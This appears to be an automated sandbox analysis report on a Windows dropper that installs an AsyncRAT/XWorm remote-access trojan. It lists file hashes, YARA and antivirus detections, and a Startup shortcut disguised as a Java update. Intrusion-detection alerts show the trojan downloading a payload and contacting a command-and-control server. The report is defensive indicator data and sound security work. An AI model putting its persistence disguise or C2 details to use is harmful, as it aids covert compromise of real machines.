                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nv4k2okv.vep.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pyhrrefh.chu.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnmwj51w.q3x.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvqeomqm.gx4.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vatqdpag.gy2.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xllcvtp2.0td.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrjmlptr.1ly.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yp0k51qc.kvn.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zt2b0we3.4ch.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\x.exe

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):41472
                                                                      Entropy (8bit):5.587183654800141
                                                                      Encrypted:false
                                                                      SSDEEP:768:iZzGU8kyq5bzbTfFN8WuFZ4tJF5PC9O9dU68OMhE3/aZg:uzf95/b7r898Fc9UdU68OMSN
                                                                      MD5:F9A6811D7A9D5E06D73A68FC729CE66C
                                                                      SHA1:C882143D5FDE4B2E7EDB5A9ACCB534BA17D754EF
                                                                      SHA-256:C583D0A367ECFFA74B82B78116BBB04B7C92BED0300ED1C3ADC4EF3250FBB9CC
                                                                      SHA-512:4DEC52F0D1927306DEDA677FEA46D103B052AAA5F7D7F49ABE59A3618110EE542C2DB385158A393970751FCC9687EFE44A860D6330ED474C0C849369C0DA56DF
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                      Joe Sandbox View:
                                                                      • Filename: 03VPFXH490.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...kL"g................................. ........@.. ....................................@.................................p...K.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......|]...Y............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 13 15:46:55 2024, mtime=Fri Dec 13 15:46:55 2024, atime=Fri Dec 13 15:46:55 2024, length=41472, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):725
                                                                      Entropy (8bit):4.632339553574522
                                                                      Encrypted:false
                                                                      SSDEEP:12:8V37AyAbCRcy+6B1ker2VWBSjEjAwilBdPbww/t3mV:8dF2YdAUA1BFz/t3m
                                                                      MD5:27878924E3EA8955042AA1D7BE896C06
                                                                      SHA1:565A933EE444C576A2A192E155C725352E37EF90
                                                                      SHA-256:333C0D825A147ED7CEFEACD414E339243FAF71CFF4587166C65618F0F8050E94
                                                                      SHA-512:CD0FF85C0F791DAF01A50C5B7455FE46A205C7EA072592627693105938489E2DFF40D1CFDBC1B414F2D3C1D28FA0860599C15FB90ACFFABD08A25A144993949C
                                                                      Malicious:false
                                                                      Preview:L..................F.... ..HK..~M..HK..~M..HK..~M...............................P.O. .:i.....+00.../C:\...................`.1......Y... PROGRA~3..H......O.I.Y......g.......................f.P.r.o.g.r.a.m.D.a.t.a.....|.2......Y. JAVAUP~1.EXE..`......Y..Y.....A.........................J.a.v.a. .U.p.d.a.t.e. .(.3.2.b.i.t.)...e.x.e.......U...............-.......T...........9.K......C:\ProgramData\Java Update (32bit).exe..>.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.J.a.v.a. .U.p.d.a.t.e. .(.3.2.b.i.t.)...e.x.e.`.......X.......721680...........hT..CrF.f4... .F1..q....,...W..hT..CrF.f4... .F1..q....,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.701153652912938
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • VXD Driver (31/22) 0.00%
                                                                      File name:da6ke5KbfB.exe
                                                                      File size:92'160 bytes
                                                                      MD5:a091f671b517c660c7a453158d32218a
                                                                      SHA1:88e40b83e13fce6b7feb42176685767271e7ce48
                                                                      SHA256:1cbfb22c0099d4c4fe32190e8f05ae5ecba336e2685e4125b62e93ba8adde55c
                                                                      SHA512:bba4d4904d5cb8cf06ca2e3e26fbfec72cf33d68a010f362c49c2a9f711f2a521b79a8ad176ed20256553c08998fc717c12e21612d4de13f205bf7c5ffc89e00
                                                                      SSDEEP:1536:37fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfNwWUDO4:r7DhdC6kzWypvaQ0FxyNTBfNWz
                                                                      TLSH:9C937D41F3E202F7E6F1093100A6716F973A62389764A8EBC74C3D529913AD5A63D3F9
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....P...............0....@........................................................................

                                                                      File Icon

                                                                      Icon Hash:00928e8e8686b000

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x401000
                                                                      Entrypoint Section:.code
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows cui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x5D40055D [Tue Jul 30 08:52:45 2019 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:2c5f2513605e48f2d8ea5440a870cb9e

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push 000000ACh
                                                                      push 00000000h
                                                                      push 00418068h
                                                                      call 00007F2820500E51h
                                                                      add esp, 0Ch
                                                                      push 00000000h
                                                                      call 00007F2820500E4Ah
                                                                      mov dword ptr [0041806Ch], eax
                                                                      push 00000000h
                                                                      push 00001000h
                                                                      push 00000000h
                                                                      call 00007F2820500E37h
                                                                      mov dword ptr [00418068h], eax
                                                                      call 00007F2820500DB1h
                                                                      mov eax, 0041707Ch
                                                                      mov dword ptr [0041808Ch], eax
                                                                      call 00007F282050A272h
                                                                      call 00007F2820509FDAh
                                                                      call 00007F2820506EB8h
                                                                      call 00007F282050673Ch
                                                                      call 00007F28205061CFh
                                                                      call 00007F2820505F49h
                                                                      call 00007F28205053EDh
                                                                      call 00007F2820504B6Dh
                                                                      call 00007F282050112Fh
                                                                      call 00007F2820508B38h
                                                                      call 00007F28205075E0h
                                                                      mov edx, 0041702Eh
                                                                      lea ecx, dword ptr [00418074h]
                                                                      call 00007F2820500DC8h
                                                                      push FFFFFFF5h
                                                                      call 00007F2820500DD8h
                                                                      mov dword ptr [00418094h], eax
                                                                      mov eax, 00000200h
                                                                      push eax
                                                                      lea eax, dword ptr [00418110h]
                                                                      push eax
                                                                      xor eax, eax
                                                                      push eax
                                                                      push 00000015h
                                                                      push 00000004h
                                                                      call 00007F2820506192h
                                                                      push dword ptr [004180F8h]

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1716c0xc8.data
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x80c.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x174700x23c.data
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .code0x10000x387e0x3a0046da2c5018752470fd3127bf22d63b95False0.4595231681034483data5.529218938453912IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .text0x50000xd9620xda00e1a026e66953c410d7f60b1f1e3c560fFalse0.5144244552752294data6.56248809649253IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x130000x33a50x3400a16842a34a5da6feda9533bb3e83c3c1False0.8049128605769231data7.111835561466389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x170000x178c0x1200479f97135aa99cfa0b3fce6e25e90427False0.4036458333333333data5.102440749577407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x190000x80c0xa0010449b9d609fe339adf30d715adf8786False0.6265625data6.575893471309118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_RCDATA0x1921c0x7Non-ISO extended-ASCII text, with CR line terminators2.142857142857143
                                                                      RT_RCDATA0x192240x36ddata1.0125427594070695
                                                                      RT_RCDATA0x195940xezlib compressed data1.5714285714285714
                                                                      RT_RCDATA0x195a40x1very short file (no magic)9.0
                                                                      RT_MANIFEST0x195a80x263XML 1.0 document, ASCII text0.5319148936170213

                                                                      Imports

                                                                      DLLImport
                                                                      MSVCRT.dllmemset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, wcscat, memcpy, tolower, malloc
                                                                      KERNEL32.dllGetModuleHandleW, HeapCreate, GetStdHandle, SetConsoleCtrlHandler, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, GetProcAddress, GetVersionExW, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, PeekNamedPipe, TerminateProcess, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, DuplicateHandle, CreatePipe, CreateProcessW, GetExitCodeProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, RegisterWaitForSingleObject
                                                                      USER32.DLLCharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
                                                                      GDI32.DLLGetStockObject
                                                                      COMCTL32.DLLInitCommonControlsEx
                                                                      SHELL32.DLLShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
                                                                      WINMM.DLLtimeBeginPeriod
                                                                      OLE32.DLLCoInitialize, CoTaskMemFree
                                                                      SHLWAPI.DLLPathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-12-13T17:45:59.590687+01002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.54970445.141.26.23480TCP
                                                                      2024-12-13T17:45:59.590687+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.54970445.141.26.23480TCP
                                                                      2024-12-13T17:47:06.575965+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:11.583700+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:12.505173+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.54979245.141.26.2347000TCP
                                                                      2024-12-13T17:47:14.102805+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:16.584005+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:21.606828+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:25.089353+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:25.091537+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54979245.141.26.2347000TCP
                                                                      2024-12-13T17:47:26.602719+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:30.823369+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:30.823369+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:31.606398+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:36.612036+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:38.854075+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:41.610019+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:46.607021+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:49.119922+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:49.125353+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54979245.141.26.2347000TCP
                                                                      2024-12-13T17:47:51.602593+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:47:56.625318+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:48:00.819355+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:48:00.819355+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:48:01.142564+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:48:01.643347+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:48:04.260859+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54979245.141.26.2347000TCP
                                                                      2024-12-13T17:48:04.885856+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP
                                                                      2024-12-13T17:48:04.886757+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54979245.141.26.2347000TCP
                                                                      2024-12-13T17:48:06.660233+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.2347000192.168.2.549792TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 13, 2024 17:45:57.825819969 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:45:57.947170019 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:57.947288036 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:45:57.950910091 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:45:58.071592093 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.590558052 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.590581894 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.590606928 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.590624094 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.590639114 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.590661049 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.590676069 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.590687037 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:45:59.590689898 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.590706110 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.590715885 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:45:59.590745926 CET4970480192.168.2.545.141.26.234
                                                                      Dec 13, 2024 17:45:59.591537952 CET804970445.141.26.234192.168.2.5
                                                                      Dec 13, 2024 17:45:59.591597080 CET4970480192.168.2.545.141.26.234
